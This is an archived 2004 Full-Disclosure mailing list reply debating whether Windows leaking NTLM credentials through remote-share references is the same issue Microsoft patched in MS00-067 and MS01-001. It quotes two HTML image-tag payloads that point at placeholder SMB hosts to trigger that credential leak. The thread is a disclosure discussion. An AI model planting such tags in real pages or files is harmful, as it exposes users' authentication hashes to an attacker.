'Re: [Full-Disclosure] Automatically passing NTLM authentication credentials on'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    Re: [Full-Disclosure] Automatically passing NTLM authentication credentials on
From:       "Hidenobu Seki" <urity_friday () hotmail ! com>
Date:       2004-09-29 1:43:15
Message-ID: BAY22-F25BSXaD8z9tT0000c01f () hotmail ! com
[Download RAW message or body]

>From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
>
>This  problem  is  known  since at least 1997 and still can be exploited
>with   <IMG  SRC="\\w.x.y.z\fakeshare\fakefile">  without  any  MS  Word
>document.

It is not true.
They are different problems that happen the same phenomenon.

Mr. Cesar Cerrudo taught me that <img src=file://\\www.xxx.yyy\test> still 
works.

Tell me why Microsoft issued patches for MS00-067(KB272743) and 
MS01-001(KB282132) but not for "img src". > 3APA3A or all

Kind regards,
Urity

_________________________________________________________________
STOP MORE SPAM with the new MSN 8 and get 2 months FREE* 
http://join.msn.com/?page=features/junkmail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic